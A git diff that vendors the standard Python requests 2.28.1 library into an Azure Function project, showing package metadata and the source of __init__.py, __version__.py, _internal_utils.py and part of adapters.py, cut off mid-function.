+requests/__pycache__/_internal_utils.cpython-39.pyc,, +requests/__pycache__/adapters.cpython-39.pyc,, +requests/__pycache__/api.cpython-39.pyc,, +requests/__pycache__/auth.cpython-39.pyc,, +requests/__pycache__/certs.cpython-39.pyc,, +requests/__pycache__/compat.cpython-39.pyc,, +requests/__pycache__/cookies.cpython-39.pyc,, +requests/__pycache__/exceptions.cpython-39.pyc,, 
+requests/__pycache__/help.cpython-39.pyc,, +requests/__pycache__/hooks.cpython-39.pyc,, +requests/__pycache__/models.cpython-39.pyc,, +requests/__pycache__/packages.cpython-39.pyc,, +requests/__pycache__/sessions.cpython-39.pyc,, +requests/__pycache__/status_codes.cpython-39.pyc,, +requests/__pycache__/structures.cpython-39.pyc,, +requests/__pycache__/utils.cpython-39.pyc,, +requests/__version__.py,sha256=nJVa3ef2yRyeYMhy7yHnRyjjpnNTDykZsE4Sp9irBC4,440 +requests/_internal_utils.py,sha256=aSPlF4uDhtfKxEayZJJ7KkAxtormeTfpwKSBSwtmAUw,1397 +requests/adapters.py,sha256=sEnHGl4mJz4QHBT8jG6bU5aPinUtdoH3BIuAIzT-X74,21287 +requests/api.py,sha256=dyvkDd5itC9z2g0wHl_YfD1yf6YwpGWLO7__8e21nks,6377 +requests/auth.py,sha256=h-HLlVx9j8rKV5hfSAycP2ApOSglTz77R0tz7qCbbEE,10187 +requests/certs.py,sha256=Z9Sb410Anv6jUFTyss0jFFhU6xst8ctELqfy8Ev23gw,429 +requests/compat.py,sha256=yxntVOSEHGMrn7FNr_32EEam1ZNAdPRdSE13_yaHzTk,1451 +requests/cookies.py,sha256=kD3kNEcCj-mxbtf5fJsSaT86eGoEYpD3X0CSgpzl7BM,18560 +requests/exceptions.py,sha256=DhveFBclVjTRxhRduVpO-GbMYMID2gmjdLfNEqNpI_U,3811 +requests/help.py,sha256=gPX5d_H7Xd88aDABejhqGgl9B1VFRTt5BmiYvL3PzIQ,3875 +requests/hooks.py,sha256=CiuysiHA39V5UfcCBXFIx83IrDpuwfN9RcTUgv28ftQ,733 +requests/models.py,sha256=OiVxiOdlhzpbZoxut2OhKtpYlB7WW4iHQcfqSVmT4H4,35222 +requests/packages.py,sha256=DXgv-FJIczZITmv0vEBAhWj4W-5CGCIN_ksvgR17Dvs,957 +requests/sessions.py,sha256=KUqJcRRLovNefUs7ScOXSUVCcfSayTFWtbiJ7gOSlTI,30180 +requests/status_codes.py,sha256=FvHmT5uH-_uimtRz5hH9VCbt7VV-Nei2J9upbej6j8g,4235 +requests/structures.py,sha256=-IbmhVz06S-5aPSZuUthZ6-6D9XOjRuTXHOabY041XM,2912 +requests/utils.py,sha256=5_ws-bsKI9EHl7j27yi-6HFzPBKultPgd7HfPrUToWI,33228 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/WHEEL b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/WHEEL new file mode 100644 index 0000000..153494e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/top_level.txt b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/top_level.txt new file mode 100644 index 0000000..bebaa03 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests-2.28.1.dist-info/top_level.txt @@ -0,0 +1 @@ +requests diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__init__.py new file mode 100644 index 0000000..ad793a4 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__init__.py @@ -0,0 +1,180 @@ +# __ +# /__) _ _ _ _ _/ _ +# / ( (- (/ (/ (- _) / _) +# / + +""" +Requests HTTP Library +~~~~~~~~~~~~~~~~~~~~~ + +Requests is an HTTP library, written in Python, for human beings. +Basic GET usage: + + >>> import requests + >>> r = requests.get('https://www.python.org') + >>> r.status_code + 200 + >>> b'Python is a programming language' in r.content + True + +... 
or POST: + + >>> payload = dict(key1='value1', key2='value2') + >>> r = requests.post('https://httpbin.org/post', data=payload) + >>> print(r.text) + { + ... + "form": { + "key1": "value1", + "key2": "value2" + }, + ... + } + +The other HTTP methods are supported - see `requests.api`. Full documentation +is at . + +:copyright: (c) 2017 by Kenneth Reitz. +:license: Apache 2.0, see LICENSE for more details. +""" + +import warnings + +import urllib3 + +from .exceptions import RequestsDependencyWarning + +try: + from charset_normalizer import __version__ as charset_normalizer_version +except ImportError: + charset_normalizer_version = None + +try: + from chardet import __version__ as chardet_version +except ImportError: + chardet_version = None + + +def check_compatibility(urllib3_version, chardet_version, charset_normalizer_version): + urllib3_version = urllib3_version.split(".") + assert urllib3_version != ["dev"] # Verify urllib3 isn't installed from git. + + # Sometimes, urllib3 only reports its version as 16.1. + if len(urllib3_version) == 2: + urllib3_version.append("0") + + # Check urllib3 for compatibility. + major, minor, patch = urllib3_version # noqa: F811 + major, minor, patch = int(major), int(minor), int(patch) + # urllib3 >= 1.21.1, <= 1.26 + assert major == 1 + assert minor >= 21 + assert minor <= 26 + + # Check charset_normalizer for compatibility. + if chardet_version: + major, minor, patch = chardet_version.split(".")[:3] + major, minor, patch = int(major), int(minor), int(patch) + # chardet_version >= 3.0.2, < 6.0.0 + assert (3, 0, 2) <= (major, minor, patch) < (6, 0, 0) + elif charset_normalizer_version: + major, minor, patch = charset_normalizer_version.split(".")[:3] + major, minor, patch = int(major), int(minor), int(patch) + # charset_normalizer >= 2.0.0 < 3.0.0 + assert (2, 0, 0) <= (major, minor, patch) < (3, 0, 0) + else: + raise Exception("You need either charset_normalizer or chardet installed") + + +def _check_cryptography(cryptography_version): + # cryptography < 1.3.4 + try: + cryptography_version = list(map(int, cryptography_version.split("."))) + except ValueError: + return + + if cryptography_version < [1, 3, 4]: + warning = "Old version of cryptography ({}) may cause slowdown.".format( + cryptography_version + ) + warnings.warn(warning, RequestsDependencyWarning) + + +# Check imported dependencies for compatibility. +try: + check_compatibility( + urllib3.__version__, chardet_version, charset_normalizer_version + ) +except (AssertionError, ValueError): + warnings.warn( + "urllib3 ({}) or chardet ({})/charset_normalizer ({}) doesn't match a supported " + "version!".format( + urllib3.__version__, chardet_version, charset_normalizer_version + ), + RequestsDependencyWarning, + ) + +# Attempt to enable urllib3's fallback for SNI support +# if the standard library doesn't support SNI or the +# 'ssl' library isn't available. +try: + try: + import ssl + except ImportError: + ssl = None + + if not getattr(ssl, "HAS_SNI", False): + from urllib3.contrib import pyopenssl + + pyopenssl.inject_into_urllib3() + + # Check cryptography version + from cryptography import __version__ as cryptography_version + + _check_cryptography(cryptography_version) +except ImportError: + pass + +# urllib3's DependencyWarnings should be silenced. +from urllib3.exceptions import DependencyWarning + +warnings.simplefilter("ignore", DependencyWarning) + +# Set default logging handler to avoid "No handler found" warnings. +import logging +from logging import NullHandler + +from . 
import packages, utils +from .__version__ import ( + __author__, + __author_email__, + __build__, + __cake__, + __copyright__, + __description__, + __license__, + __title__, + __url__, + __version__, +) +from .api import delete, get, head, options, patch, post, put, request +from .exceptions import ( + ConnectionError, + ConnectTimeout, + FileModeWarning, + HTTPError, + JSONDecodeError, + ReadTimeout, + RequestException, + Timeout, + TooManyRedirects, + URLRequired, +) +from .models import PreparedRequest, Request, Response +from .sessions import Session, session +from .status_codes import codes + +logging.getLogger(__name__).addHandler(NullHandler()) + +# FileModeWarnings go off per the default. +warnings.simplefilter("default", FileModeWarning, append=True) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..3dbe904 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__version__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__version__.cpython-39.pyc new file mode 100644 index 0000000..326bfe4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/__version__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/_internal_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/_internal_utils.cpython-39.pyc new file mode 100644 index 0000000..e4ffb3f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/_internal_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/adapters.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/adapters.cpython-39.pyc new file mode 100644 index 0000000..780f54b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/adapters.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/api.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/api.cpython-39.pyc new file mode 100644 index 0000000..288bb19 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/api.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/auth.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/auth.cpython-39.pyc new file mode 100644 index 0000000..8bdbdfb Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/auth.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/certs.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/certs.cpython-39.pyc new file mode 100644 index 0000000..83f93e1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/certs.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/compat.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/compat.cpython-39.pyc new file mode 100644 index 0000000..aceaf3e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/compat.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/cookies.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/cookies.cpython-39.pyc new file mode 100644 index 0000000..4219c28 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/cookies.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..c58a7ea Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/exceptions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/help.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/help.cpython-39.pyc new file mode 100644 index 0000000..7e38500 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/help.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/hooks.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/hooks.cpython-39.pyc new file mode 100644 index 0000000..a25abf6 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/hooks.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/models.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/models.cpython-39.pyc new file mode 100644 index 0000000..7853edd Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/models.cpython-39.pyc differ diff --git 
a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/packages.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/packages.cpython-39.pyc new file mode 100644 index 0000000..24f436a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/packages.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/sessions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/sessions.cpython-39.pyc new file mode 100644 index 0000000..5cd8841 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/sessions.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/status_codes.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/status_codes.cpython-39.pyc new file mode 100644 index 0000000..9ad1eec Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/status_codes.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/structures.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/structures.cpython-39.pyc new file mode 100644 index 0000000..709e257 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/structures.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/utils.cpython-39.pyc new file mode 100644 index 0000000..e3ede7e Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__pycache__/utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__version__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__version__.py new file mode 100644 index 0000000..90e04ed --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/__version__.py @@ -0,0 +1,14 @@ +# .-. .-. .-. . . .-. .-. .-. .-. +# |( |- |.| | | |- `-. | `-. +# ' ' `-' `-`.`-' `-' `-' ' `-' + +__title__ = "requests" +__description__ = "Python HTTP for Humans." 
+__url__ = "https://requests.readthedocs.io" +__version__ = "2.28.1" +__build__ = 0x022801 +__author__ = "Kenneth Reitz" +__author_email__ = "me@kennethreitz.org" +__license__ = "Apache 2.0" +__copyright__ = "Copyright 2022 Kenneth Reitz" +__cake__ = "\u2728 \U0001f370 \u2728" diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/_internal_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/_internal_utils.py new file mode 100644 index 0000000..0d122db --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/_internal_utils.py @@ -0,0 +1,48 @@ +""" +requests._internal_utils +~~~~~~~~~~~~~~ + +Provides utility functions that are consumed internally by Requests +which depend on extremely few external helpers (such as compat) +""" +import re + +from .compat import builtin_str + +_VALID_HEADER_NAME_RE_BYTE = re.compile(rb"^[^:\s][^:\r\n]*$") +_VALID_HEADER_NAME_RE_STR = re.compile(r"^[^:\s][^:\r\n]*$") +_VALID_HEADER_VALUE_RE_BYTE = re.compile(rb"^\S[^\r\n]*$|^$") +_VALID_HEADER_VALUE_RE_STR = re.compile(r"^\S[^\r\n]*$|^$") + +HEADER_VALIDATORS = { + bytes: (_VALID_HEADER_NAME_RE_BYTE, _VALID_HEADER_VALUE_RE_BYTE), + str: (_VALID_HEADER_NAME_RE_STR, _VALID_HEADER_VALUE_RE_STR), +} + + +def to_native_string(string, encoding="ascii"): + """Given a string object, regardless of type, returns a representation of + that string in the native string type, encoding and decoding where + necessary. This assumes ASCII unless told otherwise. + """ + if isinstance(string, builtin_str): + out = string + else: + out = string.decode(encoding) + + return out + + +def unicode_is_ascii(u_string): + """Determine if unicode string only contains ASCII characters. + + :param str u_string: unicode string to check. Must be unicode + and not Python 2 `str`. + :rtype: bool + """ + assert isinstance(u_string, str) + try: + u_string.encode("ascii") + return True + except UnicodeEncodeError: + return False diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/adapters.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/adapters.py new file mode 100644 index 0000000..b256d87 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/requests/adapters.py @@ -0,0 +1,584 @@ +""" +requests.adapters +~~~~~~~~~~~~~~~~~ + +This module contains the transport adapters that Requests uses to define +and maintain connections. 
+""" + +import os.path +import socket # noqa: F401 + +from urllib3.exceptions import ClosedPoolError, ConnectTimeoutError +from urllib3.exceptions import HTTPError as _HTTPError +from urllib3.exceptions import InvalidHeader as _InvalidHeader +from urllib3.exceptions import ( + LocationValueError, + MaxRetryError, + NewConnectionError, + ProtocolError, +) +from urllib3.exceptions import ProxyError as _ProxyError +from urllib3.exceptions import ReadTimeoutError, ResponseError +from urllib3.exceptions import SSLError as _SSLError +from urllib3.poolmanager import PoolManager, proxy_from_url +from urllib3.response import HTTPResponse +from urllib3.util import Timeout as TimeoutSauce +from urllib3.util import parse_url +from urllib3.util.retry import Retry + +from .auth import _basic_auth_str +from .compat import basestring, urlparse +from .cookies import extract_cookies_to_jar +from .exceptions import ( + ConnectionError, + ConnectTimeout, + InvalidHeader, + InvalidProxyURL, + InvalidSchema, + InvalidURL, + ProxyError, + ReadTimeout, + RetryError, + SSLError, +) +from .models import Response +from .structures import CaseInsensitiveDict +from .utils import ( + DEFAULT_CA_BUNDLE_PATH, + extract_zipped_paths, + get_auth_from_url, + get_encoding_from_headers, + prepend_scheme_if_needed, + select_proxy, + urldefragauth, +) + +try: + from urllib3.contrib.socks import SOCKSProxyManager +except ImportError: + + def SOCKSProxyManager(*args, **kwargs): + raise InvalidSchema("Missing dependencies for SOCKS support.") + + +DEFAULT_POOLBLOCK = False +DEFAULT_POOLSIZE = 10 +DEFAULT_RETRIES = 0 +DEFAULT_POOL_TIMEOUT = None + + +class BaseAdapter: + """The Base Transport Adapter""" + + def __init__(self): + super().__init__() + + def send( + self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None + ): + """Sends PreparedRequest object. Returns Response object. + + :param request: The :class:`PreparedRequest ` being sent. + :param stream: (optional) Whether to stream the request content. + :param timeout: (optional) How long to wait for the server to send + data before giving up, as a float, or a :ref:`(connect timeout, + read timeout) ` tuple. + :type timeout: float or tuple + :param verify: (optional) Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use + :param cert: (optional) Any user-provided SSL certificate to be trusted. + :param proxies: (optional) The proxies dictionary to apply to the request. + """ + raise NotImplementedError + + def close(self): + """Cleans up adapter specific items.""" + raise NotImplementedError + + +class HTTPAdapter(BaseAdapter): + """The built-in HTTP Adapter for urllib3. + + Provides a general-case interface for Requests sessions to contact HTTP and + HTTPS urls by implementing the Transport Adapter interface. This class will + usually be created by the :class:`Session ` class under the + covers. + + :param pool_connections: The number of urllib3 connection pools to cache. + :param pool_maxsize: The maximum number of connections to save in the pool. + :param max_retries: The maximum number of retries each connection + should attempt. Note, this applies only to failed DNS lookups, socket + connections and connection timeouts, never to requests where data has + made it to the server. By default, Requests does not retry failed + connections. 
If you need granular control over the conditions under + which we retry a request, import urllib3's ``Retry`` class and pass + that instead. + :param pool_block: Whether the connection pool should block for connections. + + Usage:: + + >>> import requests + >>> s = requests.Session() + >>> a = requests.adapters.HTTPAdapter(max_retries=3) + >>> s.mount('http://', a) + """ + + __attrs__ = [ + "max_retries", + "config", + "_pool_connections", + "_pool_maxsize", + "_pool_block", + ] + + def __init__( + self, + pool_connections=DEFAULT_POOLSIZE, + pool_maxsize=DEFAULT_POOLSIZE, + max_retries=DEFAULT_RETRIES, + pool_block=DEFAULT_POOLBLOCK, + ): + if max_retries == DEFAULT_RETRIES: + self.max_retries = Retry(0, read=False) + else: + self.max_retries = Retry.from_int(max_retries) + self.config = {} + self.proxy_manager = {} + + super().__init__() + + self._pool_connections = pool_connections + self._pool_maxsize = pool_maxsize + self._pool_block = pool_block + + self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block) + + def __getstate__(self): + return {attr: getattr(self, attr, None) for attr in self.__attrs__} + + def __setstate__(self, state): + # Can't handle by adding 'proxy_manager' to self.__attrs__ because + # self.poolmanager uses a lambda function, which isn't pickleable. + self.proxy_manager = {} + self.config = {} + + for attr, value in state.items(): + setattr(self, attr, value) + + self.init_poolmanager( + self._pool_connections, self._pool_maxsize, block=self._pool_block + ) + + def init_poolmanager( + self, connections, maxsize, block=DEFAULT_POOLBLOCK, **pool_kwargs + ): + """Initializes a urllib3 PoolManager. + + This method should not be called from user code, and is only + exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param connections: The number of urllib3 connection pools to cache. + :param maxsize: The maximum number of connections to save in the pool. + :param block: Block when no free connections are available. + :param pool_kwargs: Extra keyword arguments used to initialize the Pool Manager. + """ + # save these values for pickling + self._pool_connections = connections + self._pool_maxsize = maxsize + self._pool_block = block + + self.poolmanager = PoolManager( + num_pools=connections, + maxsize=maxsize, + block=block, + strict=True, + **pool_kwargs, + ) + + def proxy_manager_for(self, proxy, **proxy_kwargs): + """Return urllib3 ProxyManager for the given proxy. + + This method should not be called from user code, and is only + exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param proxy: The proxy to return a urllib3 ProxyManager for. + :param proxy_kwargs: Extra keyword arguments used to configure the Proxy Manager. + :returns: ProxyManager + :rtype: urllib3.ProxyManager + """ + if proxy in self.proxy_manager: + manager = self.proxy_manager[proxy] + elif proxy.lower().startswith("socks"): + username, password = get_auth_from_url(proxy) + manager = self.proxy_manager[proxy] = SOCKSProxyManager( + proxy, + username=username, + password=password, + num_pools=self._pool_connections, + maxsize=self._pool_maxsize, + block=self._pool_block, + **proxy_kwargs, + ) + else: + proxy_headers = self.proxy_headers(proxy) + manager = self.proxy_manager[proxy] = proxy_from_url( + proxy, + proxy_headers=proxy_headers, + num_pools=self._pool_connections, + maxsize=self._pool_maxsize, + block=self._pool_block, + **proxy_kwargs, + ) + + return manager + + def cert_verify(self, conn, url, verify, cert): + """Verify a SSL certificate. 
This method should not be called from user + code, and is only exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param conn: The urllib3 connection object associated with the cert. + :param url: The requested URL. + :param verify: Either a boolean, in which case it controls whether we verify + the server's TLS certificate, or a string, in which case it must be a path + to a CA bundle to use + :param cert: The SSL certificate to verify. + """ + if url.lower().startswith("https") and verify: + + cert_loc = None + + # Allow self-specified cert location. + if verify is not True: + cert_loc = verify + + if not cert_loc: + cert_loc = extract_zipped_paths(DEFAULT_CA_BUNDLE_PATH) + + if not cert_loc or not os.path.exists(cert_loc): + raise OSError( + f"Could not find a suitable TLS CA certificate bundle, " + f"invalid path: {cert_loc}" + ) + + conn.cert_reqs = "CERT_REQUIRED" + + if not os.path.isdir(cert_loc): + conn.ca_certs = cert_loc + else: + conn.ca_cert_dir = cert_loc + else: + conn.cert_reqs = "CERT_NONE" + conn.ca_certs = None + conn.ca_cert_dir = None + + if cert: + if not isinstance(cert, basestring): + conn.cert_file = cert[0] + conn.key_file = cert[1] + else: + conn.cert_file = cert + conn.key_file = None + if conn.cert_file and not os.path.exists(conn.cert_file): + raise OSError( + f"Could not find the TLS certificate file, " + f"invalid path: {conn.cert_file}" + ) + if conn.key_file and not os.path.exists(conn.key_file): + raise OSError( + f"Could not find the TLS key file, invalid path: {conn.key_file}" + ) + + def build_response(self, req, resp): + """Builds a :class:`Response ` object from a urllib3 + response. This should not be called from user code, and is only exposed + for use when subclassing the + :class:`HTTPAdapter ` + + :param req: The :class:`PreparedRequest ` used to generate the response. + :param resp: The urllib3 response object. + :rtype: requests.Response + """ + response = Response() + + # Fallback to None if there's no status_code, for whatever reason. + response.status_code = getattr(resp, "status", None) + + # Make headers case-insensitive. + response.headers = CaseInsensitiveDict(getattr(resp, "headers", {})) + + # Set encoding. + response.encoding = get_encoding_from_headers(response.headers) + response.raw = resp + response.reason = response.raw.reason + + if isinstance(req.url, bytes): + response.url = req.url.decode("utf-8") + else: + response.url = req.url + + # Add new cookies from the server. + extract_cookies_to_jar(response.cookies, req, resp) + + # Give the Response some context. + response.request = req + response.connection = self + + return response + + def get_connection(self, url, proxies=None): + """Returns a urllib3 connection for the given URL. This should not be + called from user code, and is only exposed for use when subclassing the + :class:`HTTPAdapter `. + + :param url: The URL to connect to. + :param proxies: (optional) A Requests-style dictionary of proxies used on this request. + :rtype: urllib3.ConnectionPool + """ + proxy = select_proxy(url, proxies) + + if proxy: + proxy = prepend_scheme_if_needed(proxy, "http") + proxy_url = parse_url(proxy) + if not proxy_url.host: + raise InvalidProxyURL( + "Please check proxy URL. It is malformed " + "and could be missing the host." 
+ ) + proxy_manager = self.proxy_manager_for(proxy) + conn = proxy_manager.connection_from_url(url) + else: + # Only scheme should be lower case + parsed = urlparse(url) + url = parsed.geturl() + conn = self.poolmanager.connection_from_url(url) + + return conn + + def close(self): + """Disposes of any internal state. + + Currently, this closes the PoolManager and any active ProxyManager, + which closes any pooled connections. + """ + self.poolmanager.clear() + for proxy in self.proxy_manager.values(): + proxy.clear() + + def request_url(self, request, proxies): + """Obtain the url to use when making the final request. + + If the message is being sent through a HTTP proxy, the full URL has to + be used. Otherwise, we should only use the path portion of the URL. + + This should not be called from user code, and is only exposed for use + when subclassing the + :class:`HTTPAdapter `. + + :param request: The :class:`PreparedRequest ` being sent. + :param proxies: A dictionary of schemes or schemes and hosts to proxy URLs. + :rtype: str + """ + proxy = select_proxy(request.url, proxies) + scheme = urlparse(request.url).scheme + + is_proxied_http_request = proxy and scheme != "https" + using_socks_proxy = False + if proxy: + proxy_scheme = urlparse(proxy).scheme.lower() + using_socks_proxy = proxy_scheme.startswith("socks") + + url = request.path_url + if is_proxied_http_request and not using_socks_proxy: + url = urldefragauth(request.url) + + return url + + def add_headers(self, request, **kwargs): + """Add any headers needed by the connection. As of v2.0 this does + nothing by default, but is left for overriding by users that subclass + the :class:`HTTPAdapter `. + + This should not be called from user code, and is only exposed for use + when subclassing the + :class:`HTTPAdapter `. + + :param request: The :class:`PreparedRequest ` to add headers to. + :param kwargs: The keyword arguments from the call to send(). + """ + pass + + def proxy_headers(self, proxy): + """Returns a dictionary of the headers to add to any request sent + through a proxy. This works with urllib3 magic to ensure that they are + correctly sent to the proxy, rather than in a tunnelled request if + CONNECT is being used. + + This should not be called from user code, and is only exposed for use + when subclassing the + :class:`HTTPAdapter `. + + :param proxy: The url of the proxy being used for this request. + :rtype: dict + """ + headers = {} + username, password = get_auth_from_url(proxy) + + if username: + headers["Proxy-Authorization"] = _basic_auth_str(username, password) + + return headers + + def send( + self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None + ): + """Sends PreparedRequest object. Returns Response object. + + :param request: The :class:`PreparedRequest ` being sent. + :param stream: (optional) Whether to stream the request content. + :param timeout: (optional) How long to wait for the server to send + data before giving up, as a float, or a :ref:`(connect timeout, + read timeout) ` tuple. + :type timeout: float or tuple or urllib3 Timeout object + :param verify: (optional) Either a boolean, in which case it controls whether + we verify the server's TLS certificate, or a string, in which case it + must be a path to a CA bundle to use + :param cert: (optional) Any user-provided SSL certificate to be trusted. + :param proxies: (optional) The proxies dictionary to apply to the request. 
+ :rtype: requests.Response + """ + + try: + conn = self.get_connection(request.url, proxies) + except LocationValueError as e: + raise InvalidURL(e, request=request) + + self.cert_verify(conn, request.url, verify, cert) + url = self.request_url(request, proxies) + self.add_headers( + request, + stream=stream, + timeout=timeout, + verify=verify, + cert=cert, + proxies=proxies, + ) + + chunked = not (request.body is None or "Content-Length" in request.headers) + + if isinstance(timeout, tuple): + try: + connect, read = timeout + timeout = TimeoutSauce(connect=connect, read=read) + except ValueError: + raise ValueError( + f"Invalid timeout {timeout}. Pass a (connect, read) timeout tuple, " + f"or a single float to set both timeouts to the same value." + ) + elif isinstance(timeout, TimeoutSauce): + pass + else: + timeout = TimeoutSauce(connect=timeout, read=timeout) + + try: + if not chunked: + resp = conn.urlopen( + method=request.method, + url=url, + body=request.body, + headers=request.headers, + redirect=False, + assert_same_host=False, + preload_content=False, + decode_content=False, + retries=self.max_retries, + timeout=timeout, + ) + + # Send the request. + else: + if hasattr(conn, "proxy_pool"): + conn = conn.proxy_pool + + low_conn = conn._get_conn(timeout=DEFAULT_POOL_TIMEOUT) + + try: + 